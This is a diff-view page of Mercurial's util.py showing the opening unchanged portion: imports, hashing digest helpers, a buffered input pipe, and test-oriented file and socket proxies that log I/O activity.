##// END OF EJS Templates
util: properly copy lrucachedict instances...
Gregory Szorc -
r39599:b31b01f9 default
parent child Browse files
Show More
@@ -1,3877 +1,3885
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # python 2.6 still have deprecation warning enabled by default. We do not want
145 145 # to display anything to standard user so detect if we are running test and
146 146 # only use python deprecation warning in this case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue an python native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % k)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class let us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True is any data is currently buffered
309 309
310 310 This will be used externally a pre-step for polling IO. If there is
311 311 already data then no polling should be set in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapse it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed if a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_info', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the integer bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
